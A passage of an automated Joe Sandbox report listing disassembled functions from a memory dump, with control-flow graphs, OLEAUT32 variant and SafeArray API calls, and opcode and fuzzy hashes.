                                                                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1304965753-0
                                                                                                          • Opcode ID: a37a2dd6370f7626f7446ca7023ef6e5cb10b332b43ae1a98d8e0bc1615c4431
                                                                                                          • Instruction ID: cad817bed9732f1a3302695441c8bc9c5e1c280b3c004e2815b2f43b2f2a5216
                                                                                                          • Opcode Fuzzy Hash: a37a2dd6370f7626f7446ca7023ef6e5cb10b332b43ae1a98d8e0bc1615c4431
                                                                                                          • Instruction Fuzzy Hash: 6FA11B75A00606EBDB14DFA4C984EAFB7B9FF89710F144629E506AB781CA34F941CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04BF00 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1360 6f04bf00-6f04bf6a VariantInit * 4 1361 6f04bf74-6f04bf86 1360->1361 1362 6f04bf6c-6f04bf71 1360->1362 1363 6f04bf90-6f04bfbb call 6f04c150 1361->1363 1364 6f04bf88-6f04bf8d 1361->1364 1362->1361 1367 6f04c0c4-6f04c0cd 1363->1367 1368 6f04bfc1-6f04bfdf call 6f04c150 1363->1368 1364->1363 1369 6f04c0e2-6f04c149 call 6f08a1f7 * 2 VariantClear * 4 call 6f08948b 1367->1369 1370 6f04c0cf-6f04c0df 1367->1370 1368->1367 1375 6f04bfe5-6f04c019 call 6f04dc40 1368->1375 1370->1369 1381 6f04c020-6f04c029 1375->1381 1382 6f04c01b-6f04c01e 1375->1382 1385 6f04c02e 1381->1385 1386 6f04c02b-6f04c02c 1381->1386 1384 6f04c035-6f04c037 call 6f0444c0 1382->1384 1389 6f04c03c-6f04c03e 1384->1389 1388 6f04c030-6f04c032 1385->1388 1386->1388 1388->1384 1389->1367 1391 6f04c044-6f04c05c VariantInit VariantCopy 1389->1391 1392 6f04c064-6f04c07a 1391->1392 1393 6f04c05e-6f04c05f call 6f09c1e0 1391->1393 1392->1367 1396 6f04c07c-6f04c094 VariantInit VariantCopy 1392->1396 1393->1392 1397 6f04c096-6f04c097 call 6f09c1e0 1396->1397 1398 6f04c09c-6f04c0af 1396->1398 1397->1398 1398->1367 1401 6f04c0b1-6f04c0c0 1398->1401 1401->1367
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Init$Clear$Copy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3833040332-0
                                                                                                          • Opcode ID: 50b368064cd87ed979c0bbdf3e43c68cd9bd179138bdd05acf28b0a88c30f1ed
                                                                                                          • Instruction ID: ad1c662d1eb1e5fc26f46dd6d503775c3e88b3ed7d9f3017b772da7727473ad5
                                                                                                          • Opcode Fuzzy Hash: 50b368064cd87ed979c0bbdf3e43c68cd9bd179138bdd05acf28b0a88c30f1ed
                                                                                                          • Instruction Fuzzy Hash: 1D817C71900619EFDB04DFA8CC84FEEBBB9FF49304F148169E905A7291DB75A905CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0464D0 Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1402 6f0464d0-6f046552 VariantInit * 3 SafeArrayCreateVector 1403 6f046554-6f046559 1402->1403 1404 6f04655c-6f04657e SafeArrayPutElement VariantClear 1402->1404 1403->1404 1405 6f046584-6f0465a1 1404->1405 1406 6f046661-6f046663 1404->1406 1407 6f0465a3-6f0465a6 1405->1407 1408 6f0465ab-6f0465c7 SafeArrayPutElement VariantClear 1405->1408 1409 6f046665-6f046666 SafeArrayDestroy 1406->1409 1410 6f04666c-6f04669d VariantClear * 3 1406->1410 1407->1408 1408->1406 1411 6f0465cd-6f0465db 1408->1411 1409->1410 1412 6f0465e7-6f046613 1411->1412 1413 6f0465dd-6f0465e2 call 6f09c1e0 1411->1413 1425 6f046616 call d1d149 1412->1425 1426 6f046616 call d1d148 1412->1426 1413->1412 1415 6f046618-6f04661a 1415->1406 1416 6f04661c-6f046628 1415->1416 1416->1406 1417 6f04662a-6f04663c call 6f03db30 1416->1417 1417->1406 1420 6f04663e-6f046650 call 6f0456b0 call 6f046880 1417->1420 1424 6f046655-6f04665c 1420->1424 1424->1406 1425->1415 1426->1415
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32 ref: 6F04650C
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F046519
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F046520
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6F046531
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04656D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046576
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0465B6
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F0465BF
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F046666
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046677
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04667E
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046685
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 1625659656-0
                                                                                                          • Opcode ID: 5fc7e1a0e002c7ade12184701325034334efe9d8568e7402b3c3462c39ac5ad5
                                                                                                          • Instruction ID: a6c7fd3e8d8d10fef10e2479788fdd5ddd3b43e0c890872d4bff1a0d228bdef9
                                                                                                          • Opcode Fuzzy Hash: 5fc7e1a0e002c7ade12184701325034334efe9d8568e7402b3c3462c39ac5ad5
                                                                                                          • Instruction Fuzzy Hash: BE513976108705AFC701DF64C880A5BBBF8EFCA714F108A1EF96587251EB71E906CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04CB90 Relevance: 18.1, APIs: 12, Instructions: 143COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1427 6f04cb90-6f04cc11 VariantInit * 2 SafeArrayCreateVector * 2 SafeArrayPutElement 1428 6f04cce7-6f04cce9 1427->1428 1429 6f04cc17-6f04cc4b SafeArrayPutElement VariantClear 1427->1429 1431 6f04ccf2-6f04cd18 VariantClear * 2 1428->1431 1432 6f04cceb-6f04ccec SafeArrayDestroy 1428->1432 1429->1428 1430 6f04cc51-6f04cc61 SafeArrayPutElement 1429->1430 1430->1428 1433 6f04cc67-6f04cc7b SafeArrayPutElement 1430->1433 1432->1431 1433->1428 1434 6f04cc7d-6f04cc8e 1433->1434 1435 6f04cc90-6f04cc95 call 6f09c1e0 1434->1435 1436 6f04cc9a-6f04ccc8 1434->1436 1435->1436 1441 6f04ccc9 call d1d149 1436->1441 1442 6f04ccc9 call d1d148 1436->1442 1438 6f04cccb-6f04cccd 1438->1428 1439 6f04cccf-6f04cce1 1438->1439 1439->1428 1440 6f04cce3 1439->1440 1440->1428 1441->1438 1442->1438
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04CBCA
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04CBD3
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F04CBE4
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F04CBF6
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04CC0D
                                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F04CC39
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04CC42
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F04CC5D
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6F04CC77
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F04CCEC
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04CCFC
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04CD02
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3548156019-0
                                                                                                          • Opcode ID: f33458f1a0e9d6c09284700671458bc607c88da3fe6a904bdd24d29bde65eac7
                                                                                                          • Instruction ID: f6950f7318eb126173d7746c835225c7f59815bb40e43bdbdd8d5f0202e0c90c
                                                                                                          • Opcode Fuzzy Hash: f33458f1a0e9d6c09284700671458bc607c88da3fe6a904bdd24d29bde65eac7
                                                                                                          • Instruction Fuzzy Hash: 4E513FB5D00249EFDB00DFA4C884EEEBBB8FF59714F00816AEA15A7351D771A905CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03A350 Relevance: 16.7, APIs: 11, Instructions: 206COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1443 6f03a350-6f03a3bd VariantInit * 3 call 6f0438e0 1446 6f03a3c3-6f03a3d6 1443->1446 1447 6f03a505-6f03a528 VariantClear * 3 1443->1447 1450 6f03a3e0-6f03a3f7 VariantCopy 1446->1450 1451 6f03a3d8-6f03a3dd 1446->1451 1448 6f03a532-6f03a546 1447->1448 1449 6f03a52a-6f03a52d 1447->1449 1449->1448 1452 6f03a3f9-6f03a3fa call 6f09c1e0 1450->1452 1453 6f03a3ff-6f03a411 VariantClear 1450->1453 1451->1450 1452->1453 1455 6f03a413-6f03a418 call 6f09c1e0 1453->1455 1456 6f03a41d-6f03a42b 1453->1456 1455->1456 1458 6f03a431-6f03a433 1456->1458 1459 6f03a42d-6f03a42f 1456->1459 1460 6f03a436-6f03a43a 1458->1460 1459->1460 1461 6f03a440 1460->1461 1462 6f03a43c-6f03a43e 1460->1462 1463 6f03a442-6f03a477 1461->1463 1462->1463 1479 6f03a47a call d1d149 1463->1479 1480 6f03a47a call d1d148 1463->1480 1464 6f03a47c-6f03a47e 1464->1447 1465 6f03a484-6f03a493 1464->1465 1466 6f03a495-6f03a49a call 6f09c1e0 1465->1466 1467 6f03a49f-6f03a4b0 1465->1467 1466->1467 1469 6f03a4b2-6f03a4b4 1467->1469 1470 6f03a4b6-6f03a4b8 1467->1470 1471 6f03a4bb-6f03a4bf 1469->1471 1470->1471 1472 6f03a4c1-6f03a4c3 1471->1472 1473 6f03a4c5 1471->1473 1474 6f03a4c7-6f03a503 1472->1474 1473->1474 1474->1447 1476 6f03a549-6f03a578 VariantClear * 3 1474->1476 1477 6f03a582-6f03a596 1476->1477 1478 6f03a57a-6f03a57f 1476->1478 1478->1477 1479->1464 1480->1464
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$Init$Copy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3214764494-0
                                                                                                          • Opcode ID: dc29ca66cca0f7d92db631e4e8ef3893d9248d3af04b079b2d7b95989782fd48
                                                                                                          • Instruction ID: 9fd4fad2cf2ad358364301c726552b2feec946eefd2fa4c7faf9caec4638c86a
                                                                                                          • Opcode Fuzzy Hash: dc29ca66cca0f7d92db631e4e8ef3893d9248d3af04b079b2d7b95989782fd48
                                                                                                          • Instruction Fuzzy Hash: CC7147766083429FD700DF69C980B4BB7E8BF89714F108A5DFA55CB291D731E804CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04CD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1535 6f04cd20-6f04cd97 VariantInit * 3 SafeArrayCreateVector 1536 6f04cda1-6f04cdc0 SafeArrayPutElement VariantClear 1535->1536 1537 6f04cd99-6f04cd9c 1535->1537 1538 6f04cdc6-6f04cdd1 1536->1538 1539 6f04d2a0-6f04d2a2 1536->1539 1537->1536 1542 6f04cdd3-6f04cdd8 call 6f09c1e0 1538->1542 1543 6f04cddd-6f04cdef 1538->1543 1540 6f04d2a4-6f04d2a5 SafeArrayDestroy 1539->1540 1541 6f04d2ab-6f04d2d7 VariantClear * 3 1539->1541 1540->1541 1542->1543 1543->1539 1546 6f04cdf5-6f04ce01 1543->1546 1546->1539 1547 6f04ce07-6f04cea4 1546->1547 1555 6f04cea6-6f04ceb7 1547->1555 1556 6f04ceba-6f04cf2b 1547->1556 1555->1556 1562 6f04cf41-6f04d222 1556->1562 1563 6f04cf2d-6f04cf3e 1556->1563 1598 6f04d224-6f04d229 call 6f09c1e0 1562->1598 1599 6f04d22e-6f04d25c 1562->1599 1563->1562 1598->1599 1602 6f04d29d 1599->1602 1603 6f04d25e-6f04d269 1599->1603 1602->1539 1603->1602 1604 6f04d26b-6f04d27b call 6f03db30 1603->1604 1604->1602 1607 6f04d27d-6f04d28d call 6f0456b0 call 6f046880 1604->1607 1611 6f04d292-6f04d299 1607->1611 1611->1602
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04CD5C
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04CD65
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04CD6B
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04CD76
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04CDAA
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04CDB7
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F04D2A5
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04D2B5
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04D2BB
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04D2C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 2515392200-0
                                                                                                          • Opcode ID: 5bad629f57e6ac7a72f3e1652d3863ef885f82eae0d5b83b1b3a3ab064dea24a
                                                                                                          • Instruction ID: 9e8c1e4c5e8d54bea2c44ad45cbb075e93e8bdeb54fb2e331cc6877b1833fa0c
                                                                                                          • Opcode Fuzzy Hash: 5bad629f57e6ac7a72f3e1652d3863ef885f82eae0d5b83b1b3a3ab064dea24a
                                                                                                          • Instruction Fuzzy Hash: 3D12E475A15705AFC758DBA8DD84DAAB3B9BF8D300F14466CF50AABB91CA30F841CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0466A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1612 6f0466a0-6f046725 VariantInit * 2 SafeArrayCreateVector 1613 6f046727-6f04672a 1612->1613 1614 6f04672f-6f04674f SafeArrayPutElement VariantClear 1612->1614 1613->1614 1615 6f046844-6f046846 1614->1615 1616 6f046755-6f046772 1614->1616 1619 6f04684f-6f046878 VariantClear * 2 1615->1619 1620 6f046848-6f046849 SafeArrayDestroy 1615->1620 1617 6f046774-6f046779 1616->1617 1618 6f04677c-6f04679c SafeArrayPutElement VariantClear 1616->1618 1617->1618 1618->1615 1621 6f0467a2-6f0467b0 1618->1621 1620->1619 1622 6f0467b2-6f0467b7 call 6f09c1e0 1621->1622 1623 6f0467bc-6f0467ef 1621->1623 1622->1623 1635 6f0467f2 call d1d149 1623->1635 1636 6f0467f2 call d1d148 1623->1636 1625 6f0467f4-6f0467f6 1625->1615 1626 6f0467f8-6f046805 1625->1626 1626->1615 1627 6f046807-6f04681c call 6f03db30 1626->1627 1627->1615 1630 6f04681e-6f04683f call 6f0456b0 call 6f046880 1627->1630 1630->1615 1635->1625 1636->1625
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32 ref: 6F0466DB
                                                                                                          • VariantInit.OLEAUT32 ref: 6F0466EA
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F046700
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04673A
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046747
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F046787
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046794
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F046849
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04685A
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046861
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 551789342-0
                                                                                                          • Opcode ID: f50e9000d747f85687a9d06deaf473d80a7f3f817b7e94ba71f77f16b6eaa548
                                                                                                          • Instruction ID: b588832b346f8fa90f5a6a160595e716f5c3d8419c68e5c5859e8b91867f943d
                                                                                                          • Opcode Fuzzy Hash: f50e9000d747f85687a9d06deaf473d80a7f3f817b7e94ba71f77f16b6eaa548
                                                                                                          • Instruction Fuzzy Hash: 43515A7A108706AFC701CF64C844B9BBBE9FF89714F00865DF9549B250EB30E905CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025A30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025ACB
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025AE0
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025B18
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025B2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throwstd::exception::exception$_malloc
                                                                                                          • String ID: 0Bo$0Bo$0Bo$0Bo
                                                                                                          • API String ID: 3153320871-1187963873
                                                                                                          • Opcode ID: 363176bc82a4925853e259116fdf423eee7054e01d1786e4fad1068a859a52a2
                                                                                                          • Instruction ID: 6e199da8c714635285247fca5f49a72ee1f3fce5d3e94c101ba2fe9acdeadd4a
                                                                                                          • Opcode Fuzzy Hash: 363176bc82a4925853e259116fdf423eee7054e01d1786e4fad1068a859a52a2
                                                                                                          • Instruction Fuzzy Hash: D13193B5900708ABCB14DF98D840B9AF7F8FF48754F40826EE81997744EB31AA04CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0484BF
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0484D2
                                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6F04850A
                                                                                                            • Part of subcall function 6F043A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F043B71
                                                                                                            • Part of subcall function 6F043A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F043B83
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
